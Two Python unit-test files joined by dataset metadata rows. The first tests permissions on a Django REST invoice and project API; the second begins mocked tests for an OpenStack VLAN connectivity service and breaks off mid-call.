f"should be {status.HTTP_200_OK}, "
f"content: {response.data}, uri: {uri}")
self.assertEqual(response.status_code, status.HTTP_200_OK, msg)
# Share the default project's item with second project.
item_0.process_shared_projects([project_1])
# Test that second project can read default project's item.
response = client.get(uri, **self.HEADERS)
msg = (f"Response: {response.status_code} should be "
f"{status.HTTP_200_OK}, content: {response.data}, uri: {uri}")
self.assertEqual(response.status_code, status.HTTP_200_OK, msg)
def test_invalid_PUT_shared_projects(self):
#self.skipTest("Temporarily skipped")
# Create objects
(client, uri,
project_0, item_0,
project_1, item_1) = self._create_shared_project_objects()
# Share the default project's item with second project.
item_0.process_shared_projects([project_1])
# Test that the shared_project item cannot be updated by a second
# project user.
data = {}
data['item_number'] = 'NE556N'
data['project'] = reverse('project-detail',
kwargs={'public_id': project_0.public_id})
response = client.put(uri, data=data, **self.HEADERS)
msg = "Response: {} should be {}, content: {}, uri: {}".format(
response.status_code, status.HTTP_403_FORBIDDEN, response.data,
uri)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN, msg)
self.assertTrue(self._has_error(response), msg)
self._test_errors(response, tests={
'detail': "You do not have permission to perform this action.",
})
def test_invalid_PATCH_shared_projects(self):
#self.skipTest("Temporarily skipped")
# Create objects
(client, uri,
project_0, item_0,
project_1, item_1) = self._create_shared_project_objects()
# Share the default project's item with second project.
item_0.process_shared_projects([project_1])
# Test that the shared_project item cannot be updated by a second
# project user.
data = {'item_number': 'NE556N'}
response = client.patch(uri, data=data, **self.HEADERS)
msg = "Response: {} should be {}, content: {}, uri: {}".format(
response.status_code, status.HTTP_403_FORBIDDEN, response.data,
uri)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN, msg)
self.assertTrue(self._has_error(response), msg)
self._test_errors(response, tests={
'detail': "You do not have permission to perform this action.",
})
def test_invalid_DELETE_shared_projects(self):
#self.skipTest("Temporarily skipped")
# Create objects
(client, uri,
project_0, item_0,
project_1, item_1) = self._create_shared_project_objects()
# Share the default project's item with second project.
item_0.process_shared_projects([project_1])
# Test that the shared_project item cannot be updated by a second
# project user.
response = client.delete(uri, **self.HEADERS)
msg = "Response: {} should be {}, content: {}, uri: {}".format(
response.status_code, status.HTTP_403_FORBIDDEN, response.data,
uri)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN, msg)
self.assertTrue(self._has_error(response), msg)
self._test_errors(response, tests={
'detail': "You do not have permission to perform this action.",
})
def test_check_user(self):
"""
Test that a user is not authorized to access a project.
"""
#self.skipTest("Temporarily skipped")
# Create a 2nd user
kwargs = {}
kwargs['username'] = 'Second_User'
kwargs['password'] = 'ykwQ37Ea'
kwargs['is_active'] = True
kwargs['is_staff'] = False
kwargs['login'] = False
kwargs['is_superuser'] = True
kwargs['role'] = UserModel.DEFAULT_USER
user, client = self._create_user(**kwargs)
# Try to delete a project
response = client.delete(self.project_uri, **self.HEADERS)
msg = "Response: {} should be {}, content: {}, uri: {}".format(
response.status_code, status.HTTP_403_FORBIDDEN, response.data,
self.project_uri)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN, msg)
self.assertTrue(self._has_error(response), msg)
self._test_errors(response, tests={
'detail': "Authentication credentials were not provided.",
})
class TestInvoiceAPI(BaseTest, APITestCase):
def __init__(self, name):
super().__init__(name)
def setUp(self):
super().setUp()
# Create an InventoryType and Project.
in_type = self._create_inventory_type()
members = [
{'user': self.user, 'role_text': self.PROJECT_USER}
]
self.project = self._create_project(in_type, members=members)
self.project_uri = reverse(
'project-detail', kwargs={'public_id': self.project.public_id})
# Create regions
self.country = self._create_country()
self.currency = self._create_currency(
self.country, "US Dollar", "USD", 840, 2)
self.cur_uri = reverse('currency-detail',
kwargs={'pk': self.currency.pk})
self.supplier = self._create_supplier(self.project)
self.sup_uri = reverse('supplier-detail',
kwargs={'public_id': self.supplier.public_id})
def test_GET_invoice_list_with_invalid_permissions(self):
"""
Test the invoice_list endpoint with no permissions.
"""
#self.skipTest("Temporarily skipped")
method = 'get'
invoice_number = "TEST12345"
invoice = self._create_invoice(
self.project, self.currency, self.supplier, invoice_number)
uri = reverse('invoice-list')
self._test_users_with_invalid_permissions(uri, method)
self._test_project_users_with_invalid_permissions(uri, method)
def test_GET_invoice_list_with_valid_permissions(self):
"""
Test the invoice_list endpoint with valid permissions.
"""
#self.skipTest("Temporarily skipped")
method = 'get'
invoice_number = "TEST12345"
invoice = self._create_invoice(
self.project, self.currency, self.supplier, invoice_number)
uri = reverse('invoice-list')
self._test_users_with_valid_permissions(
uri, method, default_user=False)
self._test_project_users_with_valid_permissions(uri, method)
def test_POST_invoice_list_with_invalid_permissions(self):
"""
Test that a POST to invoice_list fails with invalid permissions.
"""
#self.skipTest("Temporarily skipped")
method = 'post'
uri = reverse('invoice-list')
data = {}
su = data.setdefault('SU', {})
su['invoice_number'] = 'TEST12345'
su['project'] = self.project_uri
su['currency'] = self.cur_uri
su['supplier'] = self.sup_uri
data.setdefault('AD', su.copy())
data.setdefault('DU', su.copy())
self._test_users_with_invalid_permissions(
uri, method, request_data=data)
data.setdefault('POW', su.copy())
data.setdefault('PMA', su.copy())
data.setdefault('PDU', su.copy())
self._test_project_users_with_invalid_permissions(
uri, method, request_data=data)
def test_POST_invoice_list_with_valid_permissions(self):
"""
Test that a POST to invoice_list passes with valid permissions.
"""
#self.skipTest("Temporarily skipped")
method = 'post'
uri = reverse('invoice-list')
data = {}
su = data.setdefault('SU', {})
su['invoice_number'] = 'TEST123456'
su['project'] = self.project_uri
su['currency'] = self.cur_uri
su['supplier'] = self.sup_uri
ad = data.setdefault('AD', su.copy())
ad['invoice_number'] = 'TEST234561'
du = data.setdefault('DU', su.copy())
du['invoice_number'] = 'TEST345612'
self._test_users_with_valid_permissions(
uri, method, request_data=data)
pow = data.setdefault('POW', su.copy())
pow['invoice_number'] = 'TEST456123'
pma = data.setdefault('PMA', su.copy())
pma['invoice_number'] = 'TEST561234'
pdu = data.setdefault('PDU', su.copy())
pdu['invoice_number'] = 'TEST612345'
self._test_project_users_with_valid_permissions(
uri, method, project_user=False, request_data=data)
def test_OPTIONS_invoice_list_with_invalid_permissions(self):
"""
Test that the method OPTIONS fails with invald permissions.
"""
#self.skipTest("Temporarily skipped")
method = 'options'
uri = reverse('invoice-list')
self._test_users_with_invalid_permissions(uri, method)
self._test_project_users_with_invalid_permissions(uri, method)
def test_OPTIONS_invoice_list_with_valid_permissions(self):
"""
Test that the method OPTIONS brings back the correct data.
"""
method = 'options'
uri = reverse('invoice-list')
self._test_users_with_valid_permissions(uri, method)
self._test_project_users_with_valid_permissions(uri, method)
def test_GET_invoice_detail_with_invalid_permissions(self):
"""
Test that a GET on the invoice_detail fails with invalid permissions.
"""
#self.skipTest("Temporarily skipped")
invoice_number = "TEST12345"
invoice = self._create_invoice(
self.project, self.currency, self.supplier, invoice_number)
uri = reverse('invoice-detail',
kwargs={'public_id': invoice.public_id})
method = 'get'
self._test_users_with_invalid_permissions(uri, method)
self._test_project_users_with_invalid_permissions(uri, method)
def test_GET_invoice_detail_with_valid_permissions(self):
"""
Test that a GET to invoice_detail passes with valid permissions.
"""
#self.skipTest("Temporarily skipped")
invoice_number = "TEST12345"
invoice = self._create_invoice(
self.project, self.currency, self.supplier, invoice_number)
uri = reverse('invoice-detail',
kwargs={'public_id': invoice.public_id})
method = 'get'
self._test_users_with_valid_permissions(uri, method)
self._test_project_users_with_valid_permissions(uri, method)
def test_PUT_invoice_detail_with_invalid_permissions(self):
"""
Test that a PUT to invoice_detail fails with invalid permissions.
"""
#self.skipTest("Temporarily skipped")
invoice_number = "TEST12345"
invoice = self._create_invoice(
self.project, self.currency, self.supplier, invoice_number)
uri = reverse('invoice-detail',
kwargs={'public_id': invoice.public_id})
method = 'put'
data = {}
su = data.setdefault('SU', {})
su['invoice_number'] = 'TEST12345'
su['project'] = self.project_uri
su['currency'] = self.cur_uri
su['supplier'] = self.sup_uri
data.setdefault('AD', su.copy())
data.setdefault('DU', su.copy())
self._test_users_with_invalid_permissions(
uri, method, request_data=data)
data.setdefault('POW', su.copy())
data.setdefault('PMA', su.copy())
data.setdefault('PDU', su.copy())
self._test_project_users_with_invalid_permissions(
uri, method, request_data=data)
def test_PUT_invoice_detail_with_valid_permissions(self):
"""
Test that a PUT to invoice_detail passes with valid permissions.
"""
#self.skipTest("Temporarily skipped")
invoice_number = "TEST1234567"
invoice = self._create_invoice(
self.project, self.currency, self.supplier, invoice_number)
uri = reverse('invoice-detail',
kwargs={'public_id': invoice.public_id})
method = 'put'
data = {}
su = data.setdefault('SU', {})
su['invoice_number'] = 'TEST2345671'
su['project'] = self.project_uri
su['currency'] = self.cur_uri
su['supplier'] = self.sup_uri
ad = data.setdefault('AD', su.copy())
ad['invoice_number'] = 'TEST3456712'
du = data.setdefault('DU', su.copy())
du['invoice_number'] = 'TEST4567123'
self._test_users_with_valid_permissions(
uri, method, request_data=data)
pow = data.setdefault('POW', su.copy())
pow['invoice_number'] = 'TEST5671234'
pma = data.setdefault('PMA', su.copy())
pma['invoice_number'] = 'TEST6712345'
pdu = data.setdefault('PDU', su.copy())
pdu['invoice_number'] = 'TEST7123456'
self._test_project_users_with_valid_permissions(
uri, method, project_user=False, request_data=data)
def test_PATCH_invoice_detail_with_invalid_permissions(self):
"""
Test that a PATCH to invoice_detail fails with invalid permissions.
"""
#self.skipTest("Temporarily skipped")
invoice_number = "TEST1234567"
invoice = self._create_invoice(
self.project, self.currency, self.supplier, invoice_number)
uri = reverse('invoice-detail',
kwargs={'public_id': invoice.public_id})
method = 'patch'
data = {}
su = data.setdefault('SU', {})
su['invoice_number'] = 'TEST2345671'
su['project'] = self.project_uri
data.setdefault('AD', su.copy())
data.setdefault('DU', su.copy())
self._test_users_with_invalid_permissions(
uri, method, request_data=data)
data.setdefault('POW', su.copy())
data.setdefault('PMA', su.copy())
data.setdefault('PDU', su.copy())
self._test_project_users_with_invalid_permissions(
uri, method, request_data=data)
def test_PATCH_invoice_detail_with_valid_permissions(self):
"""
Test that a PATCH to invoice_detail passes with valid permissions.
"""
#self.skipTest("Temporarily skipped")
invoice_number = "TEST1234567"
invoice = self._create_invoice(
self.project, self.currency, self.supplier, invoice_number)
uri = reverse('invoice-detail',
kwargs={'public_id': invoice.public_id})
method = 'patch'
data = {}
su = data.setdefault('SU', {})
su['invoice_number'] = 'TEST2345671'
ad = data.setdefault('AD', {})
ad['invoice_number'] = 'TEST3456712'
du = data.setdefault('DU', {})
du['invoice_number'] = 'TEST4567123'
self._test_users_with_valid_permissions(
uri, method, request_data=data)
pow = data.setdefault('POW', {})
pow['invoice_number'] = 'TEST5671234'
pma = data.setdefault('PMA', {})
pma['invoice_number'] = 'TEST6712345'
pdu = data.setdefault('PDU', {})
pdu['invoice_number'] = 'TEST7123456'
self._test_project_users_with_valid_permissions(
uri, method, project_user=False, request_data=data)
def test_DELETE_invoice_detail_with_invalid_permissions(self):
"""
Test that a DELETE to invoice_detail fails with invalid permissions.
"""
#self.skipTest("Temporarily skipped")
invoice_number = "TEST1234567"
method = 'delete'
invoice = self._create_invoice(
self.project, self.currency, self.supplier, invoice_number)
uri = reverse('invoice-detail',
kwargs={'public_id': invoice.public_id})
self._test_users_with_invalid_permissions(uri, method)
self._test_project_users_with_invalid_permissions(uri, method)
def test_DELETE_invoice_detail_with_valid_permissions(self):
"""
Test that a DELETE to invoice_detail pass' with valid permissions.
"""
#self.skipTest("Temporarily skipped")
invoice_number = "TEST1234567"
method = 'delete'
# Test SUPERUSER
invoice = self._create_invoice(
self.project, self.currency, self.supplier, invoice_number)
uri = reverse('invoice-detail',
kwargs={'public_id': invoice.public_id})
self._test_superuser_with_valid_permissions(uri, method)
self._test_valid_GET_with_errors(uri)
# Test ADMINISTRATOR
invoice = self._create_invoice(
self.project, self.currency, self.supplier, invoice_number)
uri = reverse('invoice-detail',
kwargs={'public_id': invoice.public_id})
self._test_administrator_with_valid_permissions(uri, method)
self._test_valid_GET_with_errors(uri)
# Test DEFAULT_USER
## This is an invalid test since the DEFAULT_USER has no access.
# Test PROJECT_OWNER
invoice = self._create_invoice(
self.project, self.currency, self.supplier, invoice_number)
uri = reverse('invoice-detail',
kwargs={'public_id': invoice.public_id})
self._test_project_owner_with_valid_permissions(uri, method)
self._test_valid_GET_with_errors(uri)
# Test PROJECT_MANAGER
invoice = self._create_invoice(
self.project, self.currency, self.supplier, invoice_number)
uri = reverse('invoice-detail',
kwargs={'public_id': invoice.public_id})
self._test_project_manager_with_valid_permissions(uri, method)
self._test_valid_GET_with_errors(uri)
# Test PROJECT_USER
## This is an invalid test since the PROJECT_USER has no access.
def test_OPTIONS_invoice_detail_with_invalid_permissions(self):
"""
Test that the method OPTIONS fails with invald permissions.
"""
#self.skipTest("Temporarily skipped")
invoice_number = "TEST1234567"
method = 'options'
invoice = self._create_invoice(
self.project, self.currency, self.supplier, invoice_number)
uri = reverse('invoice-detail',
kwargs={'public_id': invoice.public_id})
self._test_users_with_invalid_permissions(uri, method)
self._test_project_users_with_invalid_permissions(uri, method)
def test_OPTIONS_invoice_detail_with_valid_permissions(self):
"""
Test that the method OPTIONS brings back the correct data.
"""
#self.skipTest("Temporarily skipped")
invoice_number = "TEST1234567"
method = 'options'
invoice = self._create_invoice(
self.project, self.currency, self.supplier, invoice_number)
uri = reverse('invoice-detail',
kwargs={'public_id': invoice.public_id})
self._test_users_with_valid_permissions(uri, method)
self._test_project_users_with_valid_permissions(uri, method)
class TestInvoiceItemAPI(BaseTest, APITestCase):
def __init__(self, name):
super().__init__(name)
def setUp(self):
super().setUp()
# Create an InventoryType and Project.
in_type = self._create_inventory_type()
members = [
{'user': self.user, 'role_text': self.PROJECT_USER}
]
self.project = self._create_project(in_type, members=members)
# Create regions
country = self._create_country()
currency = self._create_currency(country, "US Dollar", "USD", 840, 2)
supplier = self._create_supplier(self.project)
# Create Invoice
self.invoice = self._create_invoice(
self.project, currency, supplier, "TEST01234567")
self.inv_uri = reverse('invoice-detail',
kwargs={'public_id': self.invoice.public_id})
# Create a ColumnCollection
kwargs = {}
kwargs['name'] = "Test Collection"
kwargs['related_model'] = 'item'
kwargs['creator'] = self.user
kwargs['updater'] = self.user
self.collection = ColumnCollection(**kwargs)
self.collection.save()
def test_GET_invoice_item_list_with_invalid_permissions(self):
"""
Test the invoice_item_list endpoint with no permissions.
"""
#self.skipTest("Temporarily skipped")
method = 'get'
item_number = "TEST123456"
invoice_item = self._create_invoice_item(
self.invoice, item_number, 5, '1.50')
uri = reverse('invoice-item-list')
self._test_users_with_invalid_permissions(uri, method)
self._test_project_users_with_invalid_permissions(uri, method)
def test_GET_invoice_item_list_with_valid_permissions(self):
"""
Test the invoice_item_list endpoint with valid permissions.
"""
#self.skipTest("Temporarily skipped")
method = 'get'
item_number = "TEST123456"
invoice_item = self._create_invoice_item(
self.invoice, item_number, 5, '1.50')
uri = reverse('invoice-item-list')
self._test_users_with_valid_permissions(uri, method,
default_user=False)
self._test_project_users_with_valid_permissions(uri, method)
def test_POST_invoice_item_list_with_invalid_permissions(self):
"""
Test that a POST to invoice_item_list fails with invalid permissions.
"""
#self.skipTest("Temporarily skipped")
method = 'post'
uri = reverse('invoice-item-list')
data = {}
su = data.setdefault('SU', {})
su['item_number'] = 'TEST123456'
su['quantity'] = 5
su['unit_price'] = '1.50'
su['invoice'] = self.inv_uri
data.setdefault('AD', su.copy())
data.setdefault('DU', su.copy())
self._test_users_with_invalid_permissions(
uri, method, request_data=data)
data.setdefault('POW', su.copy())
data.setdefault('PMA', su.copy())
data.setdefault('PDU', su.copy())
self._test_project_users_with_invalid_permissions(
uri, method, request_data=data)
def test_POST_invoice_item_list_with_valid_permissions(self):
"""
Test that a POST to invoice_item_list passes with valid permissions.
"""
#self.skipTest("Temporarily skipped")
method = 'post'
uri = reverse('invoice-item-list')
data = {}
su = data.setdefault('SU', {})
su['item_number'] = 'TEST123456'
su['quantity'] = 5
su['unit_price'] = '1.50'
su['invoice'] = self.inv_uri
ad = data.setdefault('AD', su.copy())
ad['item_number'] = 'TEST234561'
du = data.setdefault('DU', su.copy())
du['item_number'] = 'TEST345612'
self._test_users_with_valid_permissions(
uri, method, request_data=data)
pow = data.setdefault('POW', su.copy())
pow['item_number'] = 'TEST456123'
pma = data.setdefault('PMA', su.copy())
pma['item_number'] = 'TEST561234'
pdu = data.setdefault('PDU', su.copy())
pdu['item_number'] = 'TEST612345'
self._test_project_users_with_valid_permissions(
uri, method, project_user=False, request_data=data)
def test_OPTIONS_invoice_item_list_with_invalid_permissions(self):
"""
Test that the method OPTIONS fails with invald permissions.
"""
#self.skipTest("Temporarily skipped")
method = 'options'
uri = reverse('invoice-item-list')
self._test_users_with_invalid_permissions(uri, method)
self._test_project_users_with_invalid_permissions(uri, method)
def test_OPTIONS_invoice_item_list_with_valid_permissions(self):
"""
Test that the method OPTIONS brings back the correct data.
"""
method = 'options'
uri = reverse('invoice-item-list')
self._test_users_with_valid_permissions(uri, method)
self._test_project_users_with_valid_permissions(uri, method)
def test_GET_invoice_item_detail_with_invalid_permissions(self):
"""
Test that a GET on the invoice_item_detail fails with invalid
permissions.
"""
#self.skipTest("Temporarily skipped")
item_number = "TEST12345"
invoice_item = self._create_invoice_item(
self.invoice, item_number, 5, '1.50')
uri = reverse('invoice-item-detail',
kwargs={'public_id': invoice_item.public_id})
method = 'get'
self._test_users_with_invalid_permissions(uri, method)
self._test_project_users_with_invalid_permissions(uri, method)
def test_GET_invoice_item_detail_with_valid_permissions(self):
"""
Test that a GET to invoice_item_detail passes with valid permissions.
"""
#self.skipTest("Temporarily skipped")
item_number = "TEST12345"
invoice_item = self._create_invoice_item(
self.invoice, item_number, 5, '1.50')
uri = reverse('invoice-item-detail',
kwargs={'public_id': invoice_item.public_id})
method = 'get'
self._test_users_with_valid_permissions(uri, method)
self._test_project_users_with_valid_permissions(uri, method)
def test_PUT_invoice_item_detail_with_invalid_permissions(self):
"""
Test that a PUT to invoice_item_detail fails with invalid permissions.
"""
#self.skipTest("Temporarily skipped")
item_number = "TEST12345"
invoice_item = self._create_invoice_item(
self.invoice, item_number, 5, '1.50')
uri = reverse('invoice-item-detail',
kwargs={'public_id': invoice_item.public_id})
method = 'put'
data = {}
su = data.setdefault('SU', {})
su['item_number'] = 'TEST12345'
su['quantity'] = 5
su['unit_price'] = '1.50'
su['invoice'] = self.inv_uri
data.setdefault('AD', su.copy())
data.setdefault('DU', su.copy())
self._test_users_with_invalid_permissions(
uri, method, request_data=data)
data.setdefault('POW', su.copy())
data.setdefault('PMA', su.copy())
data.setdefault('PDU', su.copy())
self._test_project_users_with_invalid_permissions(
uri, method, request_data=data)
def test_PUT_invoice_item_detail_with_valid_permissions(self):
"""
Test that a PUT to invoice_item_detail passes with valid permissions.
"""
#self.skipTest("Temporarily skipped")
item_number = "TEST1234567"
invoice_item = self._create_invoice_item(
self.invoice, item_number, 5, '1.50')
uri = reverse('invoice-item-detail',
kwargs={'public_id': invoice_item.public_id})
method = 'put'
data = {}
su = data.setdefault('SU', {})
su['item_number'] = 'TEST2345671'
su['quantity'] = 5
su['unit_price'] = '1.50'
su['invoice'] = self.inv_uri
ad = data.setdefault('AD', su.copy())
ad['item_number'] = 'TEST3456712'
du = data.setdefault('DU', su.copy())
du['item_number'] = 'TEST4567123'
self._test_users_with_valid_permissions(
uri, method, request_data=data)
pow = data.setdefault('POW', su.copy())
pow['item_number'] = 'TEST5671234'
pma = data.setdefault('PMA', su.copy())
pma['item_number'] = 'TEST6712345'
pdu = data.setdefault('PDU', su.copy())
pdu['item_number'] = 'TEST7123456'
self._test_project_users_with_valid_permissions(
uri, method, project_user=False, request_data=data)
def test_PATCH_invoice_item_detail_with_invalid_permissions(self):
"""
Test that a PATCH to invoice_item_detail fails with invalid
permissions.
"""
#self.skipTest("Temporarily skipped")
item_number = "TEST1234567"
invoice_item = self._create_invoice_item(
self.invoice, item_number, 5, '1.50')
uri = reverse('invoice-item-detail',
kwargs={'public_id': invoice_item.public_id})
method = 'patch'
data = {}
su = data.setdefault('SU', {})
su['item_number'] = 'TEST2345671'
su['quantity'] = 5
su['unit_price'] = '1.50'
su['invoice'] = self.inv_uri
data.setdefault('AD', su.copy())
data.setdefault('DU', su.copy())
self._test_users_with_invalid_permissions(
uri, method, request_data=data)
data.setdefault('POW', su.copy())
data.setdefault('PMA', su.copy())
data.setdefault('PDU', su.copy())
self._test_project_users_with_invalid_permissions(
uri, method, request_data=data)
def test_PATCH_invoice_item_detail_with_valid_permissions(self):
"""
Test that a PATCH to invoice_item_detail passes with valid
permissions.
"""
#self.skipTest("Temporarily skipped")
item_number = "TEST1234567"
invoice_item = self._create_invoice_item(
self.invoice, item_number, 5, '1.50')
uri = reverse('invoice-item-detail',
kwargs={'public_id': invoice_item.public_id})
method = 'patch'
data = {}
su = data.setdefault('SU', {})
su['item_number'] = 'TEST2345671'
ad = data.setdefault('AD', {})
ad['item_number'] = 'TEST3456712'
du = data.setdefault('DU', {})
du['item_number'] = 'TEST4567123'
self._test_users_with_valid_permissions(
uri, method, request_data=data)
pow = data.setdefault('POW', {})
pow['item_number'] = 'TEST5671234'
pma = data.setdefault('PMA', {})
pma['item_number'] = 'TEST6712345'
pdu = data.setdefault('PDU', {})
pdu['item_number'] = 'TEST7123456'
self._test_project_users_with_valid_permissions(
uri, method, project_user=False, request_data=data)
def test_DELETE_invoice_item_detail_with_invalid_permissions(self):
"""
Test that a DELETE to invoice_item_detail fails with invalid
permissions.
"""
#self.skipTest("Temporarily skipped")
item_number = "TEST1234567"
method = 'delete'
invoice_item = self._create_invoice_item(
self.invoice, item_number, 5, '1.50')
uri = reverse('invoice-item-detail',
kwargs={'public_id': invoice_item.public_id})
self._test_users_with_invalid_permissions(uri, method)
self._test_project_users_with_invalid_permissions(uri, method)
def test_DELETE_invoice_item_detail_with_valid_permissions(self):
"""
Test that a DELETE to invoice_item_detail pass' with valid
permissions.
"""
#self.skipTest("Temporarily skipped")
item_number = "TEST1234567"
method = 'delete'
# Test SUPERUSER
invoice_item = self._create_invoice_item(
self.invoice, item_number, 5, '1.50')
uri = reverse('invoice-item-detail',
kwargs={'public_id': invoice_item.public_id})
self._test_superuser_with_valid_permissions(uri, method)
self._test_valid_GET_with_errors(uri)
# Test ADMINISTRATOR
invoice_item = self._create_invoice_item(
self.invoice, item_number, 5, '1.50')
uri = reverse('invoice-item-detail',
kwargs={'public_id': invoice_item.public_id})
self._test_administrator_with_valid_permissions(uri, method)
self._test_valid_GET_with_errors(uri)
# Test DEFAULT_USER
## This is an invalid test since the DEFAULT_USER has no access.
# Test PROJECT_OWNER
invoice_item = self._create_invoice_item(
self.invoice, item_number, 5, '1.50')
uri = reverse('invoice-item-detail',
kwargs={'public_id': invoice_item.public_id})
self._test_project_owner_with_valid_permissions(uri, method)
self._test_valid_GET_with_errors(uri)
# Test PROJECT_MANAGER
invoice_item = self._create_invoice_item(
self.invoice, item_number, 5, '1.50')
uri = reverse('invoice-item-detail',
kwargs={'public_id': invoice_item.public_id})
self._test_project_manager_with_valid_permissions(uri, method)
self._test_valid_GET_with_errors(uri)
# Test PROJECT_USER
## This is an invalid test since the PROJECT_USER has no access.
def test_OPTIONS_invoice_item_detail_with_invalid_permissions(self):
"""
Test that the method OPTIONS fails with invald permissions.
"""
#self.skipTest("Temporarily skipped")
item_number = "TEST1234567"
method = 'options'
invoice_item = self._create_invoice_item(
self.invoice, item_number, 5, '1.50')
uri = reverse('invoice-item-detail',
kwargs={'public_id': invoice_item.public_id})
self._test_users_with_invalid_permissions(uri, method)
self._test_project_users_with_invalid_permissions(uri, method)
def test_OPTIONS_invoice_item_detail_with_valid_permissions(self):
"""
Test that the method OPTIONS brings back the correct data.
"""
#self.skipTest("Temporarily skipped")
item_number = "TEST1234567"
method = 'options'
invoice_item = self._create_invoice_item(
self.invoice, item_number, 5, '1.50')
uri = reverse('invoice-item-detail',
kwargs={'public_id': invoice_item.public_id})
self._test_users_with_valid_permissions(uri, method)
self._test_project_users_with_valid_permissions(uri, method)
| 41.780778
| 78
| 0.629919
| 6,023
| 52,602
| 5.206708
| 0.037523
| 0.047194
| 0.070153
| 0.042538
| 0.940051
| 0.934503
| 0.924585
| 0.908418
| 0.889541
| 0.863616
| 0
| 0.019165
| 0.25999
| 52,602
| 1,258
| 79
| 41.81399
| 0.786467
| 0.145052
| 0
| 0.822248
| 0
| 0
| 0.115715
| 0.003177
| 0
| 0
| 0
| 0
| 0.012615
| 1
| 0.081422
| false
| 0.002294
| 0.009174
| 0
| 0.09633
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
472ebf1f9f191e92071dff1acb971c26e00bd55f
| 20,187
|
py
|
Python
|
package/tests/test_cp/test_openstack/test_domain/test_services/test_connectivity/test_vlan_connectivity_service.py
|
QualiSystems/OpenStack-Shell
|
2e218ee249867550332a9b887a7c50b76ad52e20
|
[
"ISC"
] | 1
|
2016-07-06T19:59:33.000Z
|
2016-07-06T19:59:33.000Z
|
package/tests/test_cp/test_openstack/test_domain/test_services/test_connectivity/test_vlan_connectivity_service.py
|
QualiSystems/OpenStack-Shell
|
2e218ee249867550332a9b887a7c50b76ad52e20
|
[
"ISC"
] | 256
|
2016-07-06T17:02:55.000Z
|
2020-10-01T09:35:03.000Z
|
package/tests/test_cp/test_openstack/test_domain/test_services/test_connectivity/test_vlan_connectivity_service.py
|
QualiSystems/OpenStack-Shell
|
2e218ee249867550332a9b887a7c50b76ad52e20
|
[
"ISC"
] | 1
|
2017-05-16T20:24:57.000Z
|
2017-05-16T20:24:57.000Z
|
from unittest import TestCase
from mock import Mock
from cloudshell.cp.openstack.domain.services.connectivity.vlan_connectivity_service import VLANConnectivityService
from cloudshell.cp.openstack.models.connectivity_action_resource_info import ConnectivityActionResourceInfo
from cloudshell.cp.openstack.common.deploy_data_holder import DeployDataHolder
import jsonpickle
class TestVlanConnectivityService(TestCase):
def setUp(self):
self.instance_service = Mock()
self.network_service = Mock()
self.connectivity_service = VLANConnectivityService(instance_service=self.instance_service,
network_service=self.network_service)
self.os_session = Mock()
self.mock_logger = Mock()
def test_set_vlan_actions_net_create_or_get_fail(self):
mock_cp_resource_model = Mock()
mock_test_value = 'test_value'
test_vlan_actions = {1 : mock_test_value, 2: mock_test_value}
self.connectivity_service.network_service.create_or_get_network_with_segmentation_id = Mock(return_value=None)
self.connectivity_service.set_fail_results = Mock(return_value='fail_result')
results = self.connectivity_service.set_vlan_actions(openstack_session=self.os_session,
cp_resource_model=mock_cp_resource_model,
vlan_actions=test_vlan_actions,
logger=self.mock_logger)
assert self.connectivity_service.set_fail_results.call_count == 2
self.assertTrue(results, ['fail_result', 'fail_result'])
def test_set_vlan_actions_net_create_or_get_success_no_subnet_subnet_create_fail(self):
mock_cp_resource_model = Mock()
mock_test_value = 'test_value'
test_vlan_actions = {1 : mock_test_value, 2: mock_test_value}
mock_create_or_get_result = {'id': 'test_net_id', 'subnets' : []}
self.connectivity_service.network_service.create_or_get_network_with_segmentation_id = Mock(
return_value=mock_create_or_get_result)
self.connectivity_service.network_service.create_and_attach_subnet_to_net = Mock(return_value=None)
self.connectivity_service.set_fail_results = Mock(return_value='fail_result')
results = self.connectivity_service.set_vlan_actions(openstack_session=self.os_session,
cp_resource_model=mock_cp_resource_model,
vlan_actions=test_vlan_actions,
logger=self.mock_logger)
failure_text = 'Failed to attach Subnet to Network test_net_id. Error: empty_subnet'
self.connectivity_service.set_fail_results.assert_any_call(values='test_value',
action_type='setVlan',
failure_text=failure_text)
assert self.connectivity_service.set_fail_results.call_count == 2
self.assertTrue(results, ['fail_result', 'fail_result'])
def test_set_vlan_actions_net_create_or_get_success_subnet_success(self):
mock_cp_resource_model = Mock()
mock_test_value = 'test_value'
test_vlan_actions = {1 : mock_test_value, 2: mock_test_value}
mock_create_or_get_result = {'id': 'test_net_id', 'subnets' : []}
self.connectivity_service.network_service.create_or_get_network_with_segmentation_id = Mock(
return_value=mock_create_or_get_result)
self.connectivity_service.network_service.create_and_attach_subnet_to_net = Mock(return_value='test_subnet')
self.connectivity_service.attach_nic_to_instance_action_result = Mock(return_value='Success')
results = self.connectivity_service.set_vlan_actions(openstack_session=self.os_session,
cp_resource_model=mock_cp_resource_model,
vlan_actions=test_vlan_actions,
logger=self.mock_logger)
self.assertTrue(results, ['Success', 'Success'])
def test_remove_vlan_actions_get_network_service_no_net(self):
mock_cp_resource_model = Mock()
mock_test_value = 'test_value'
test_vlan_actions = {1: mock_test_value, 2: mock_test_value}
self.connectivity_service.network_service.get_network_with_segmentation_id = Mock(return_value=None)
self.connectivity_service.set_fail_results = Mock(return_value='fail_result')
results = self.connectivity_service.remove_vlan_actions(openstack_session=self.os_session,
cp_resource_model=mock_cp_resource_model,
vlan_actions=test_vlan_actions,
logger=self.mock_logger)
assert self.connectivity_service.set_fail_results.call_count == 2
self.assertTrue(results, ['fail_result', 'fail_result'])
def test_remove_vlan_actions_get_network_service_net_found(self):
mock_cp_resource_model = Mock()
mock_test_value = 'test_value'
test_vlan_actions = {1: mock_test_value, 2: mock_test_value}
mock_get_network_with_vlanid_result = {'id' : 'test-net-id'}
self.connectivity_service.network_service.get_network_with_segmentation_id = Mock(
return_value=mock_get_network_with_vlanid_result)
self.connectivity_service.detach_nic_from_instance_action_result = Mock(return_value='Success')
self.connectivity_service.network_service.remove_subnet_and_net = Mock()
results = self.connectivity_service.remove_vlan_actions(openstack_session=self.os_session,
cp_resource_model=mock_cp_resource_model,
